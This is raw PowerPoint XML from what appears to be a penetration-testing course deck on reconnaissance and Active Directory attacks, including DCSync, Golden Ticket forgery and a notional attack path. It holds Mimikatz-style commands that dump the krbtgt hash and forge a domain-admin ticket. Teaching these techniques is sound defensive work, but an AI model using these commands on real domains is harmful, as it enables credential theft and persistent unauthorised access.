          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Agenda/Disclaimer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D181EA2-37FB-4BD7-92FE-84E20130845C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Passive Recon / Research</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Limited selections on open-source information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Active Recon</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Port Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web Servers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Disclaimer:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A lot goes into enumeration – this will not be exhaustive</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4281586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A6EF0D-2E81-468B-9AFC-7E1E12B56F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BF92845-1C9B-4DCF-85A0-8407974BC3C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Server Message Block (SMB)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="373991114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49161-1170-4A32-9830-B5E94681A04C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>300</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F5034A9-5451-4E3D-9172-018A73251F5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2285513B-ED92-4CAE-80BE-9497AAC808AA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3414084" y="1392555"/>
            <a:ext cx="6215691" cy="4191000"/>
            <a:chOff x="3995109" y="914400"/>
            <a:chExt cx="5553850" cy="3620005"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Picture 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9244AFFA-0431-47BD-A5A4-41312E25D1AF}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="3995109" y="914400"/>
              <a:ext cx="5553850" cy="3620005"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FAFE76D5-FC1B-4406-937F-2172C0D55F9B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4984923" y="3969755"/>
              <a:ext cx="2511252" cy="183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FB040E-521D-400A-9A15-F3DD11D621F8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4840374" y="925168"/>
              <a:ext cx="2208126" cy="183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16964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80616-CF66-4158-B8AD-EBE00568B89A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>301</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08274058-D887-419A-97CB-0EA73F5CE266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{902A07B0-A8CA-4898-8C73-FFA3BABE553F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="414338" y="1295399"/>
            <a:ext cx="11363325" cy="4981576"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Similar to Silver Tickets, but much more potent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Creates a fake TGT for any account and for much longer (e.g. 10 years)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Great for persistence – can be stored offline and re-injected anywhere as long as the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account hasn’t changed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>its password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Recall Kerberos process:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>TGT encrypted with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account hash</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>krbtgt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> account hash can be obtained from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>DCSync</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as before, or from the DC</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If on the DC:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>lsadump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lsa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /inject /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>name:krbtgt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35180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1FD995-FAC6-494A-A4ED-6B4291B60DEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>302</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ADB7A666-7062-41B7-9D3D-5BA870DE417D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Ticket Syntax</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12614071-A8DD-47DC-BA10-025E30B60237}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Syntax slightly different</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>kerberos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>::golden /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:validuser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domain:domain.fqdn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sid:domainSID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krbtgt:hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> /id:500 /groups:512[+others] /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ptt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mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>NOTE: Many online guides say you can pick </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>any</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>That does not seem to be true any longer based on my lab – unknown reason/change</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="+mj-lt"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Find a valid domain administrator to impersonate (Administrator, for example)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18546933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B947B4-201A-4DA3-94C9-0052FC898E85}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>303</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AA4034-45AC-4520-8644-E3F025F09875}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Golden Ticket Example</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6850804A-874E-4633-AE60-F39F22DFBC42}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1144838" y="1376044"/>
            <a:ext cx="10174120" cy="4563112"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="38100">
            <a:solidFill>
              <a:schemeClr val="tx2"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8376317E-9897-4E3E-9D90-570D2B48DB08}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4131327" y="5269923"/>
            <a:ext cx="2174223" cy="4546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1A16A4-5836-4FFF-9FD6-74EF4277A7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1116263" y="1736148"/>
            <a:ext cx="3408112" cy="4546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3377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598083-0540-457F-BDAF-DC650AAF34CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BECF63ED-5365-0347-943C-46237B9951C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>304</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B0DCE3D-A620-4E49-BA85-C30023519BD6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Notional Attack Path</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29746287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305</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Step 1 - Access</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77010" y="3968079"/>
            <a:ext cx="1885881" cy="2045012"/>
            <a:chOff x="9020244" y="3623546"/>
            <a:chExt cx="1885881" cy="2045012"/>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77010" y="1258849"/>
            <a:ext cx="1885881" cy="2025133"/>
            <a:chOff x="9009288" y="1197713"/>
            <a:chExt cx="1885881" cy="2025133"/>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
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249D825F-BD1F-4A26-AEF3-AFC502F57F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2433933" y="4525347"/>
            <a:ext cx="3799296" cy="1722081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="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228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2400" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="466725" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr lang="en-US" sz="2000" b="0" i="0" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial Narrow" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5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Initial access on client01 as low privilege user, escalate privileges to system via &lt;some path&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="Oval 40">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB8FEE0C-A288-4E56-B0DB-BC8EAF4A2B72}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5947479" y="3074439"/>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4" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5F2A0B2-6218-4704-95B5-4DC932F11EEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2590803" y="3249427"/>
            <a:ext cx="2830036" cy="2990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12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306</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Step 2 – Gather Credentials</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77010" y="3968079"/>
            <a:ext cx="1885881" cy="2045012"/>
            <a:chOff x="9020244" y="3623546"/>
            <a:chExt cx="1885881" cy="2045012"/>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77010" y="1258849"/>
            <a:ext cx="1885881" cy="2025133"/>
            <a:chOff x="9009288" y="1197713"/>
            <a:chExt cx="1885881" cy="2025133"/>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
        <p:nvSpPr>
          <p:cNvPr id="32" name="Text Placeholder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{249D825F-BD1F-4A26-AEF3-AFC502F57F3B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="413580" y="4651117"/>
            <a:ext cx="5803461" cy="1722081"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="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228600" indent="-228600" algn="l" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
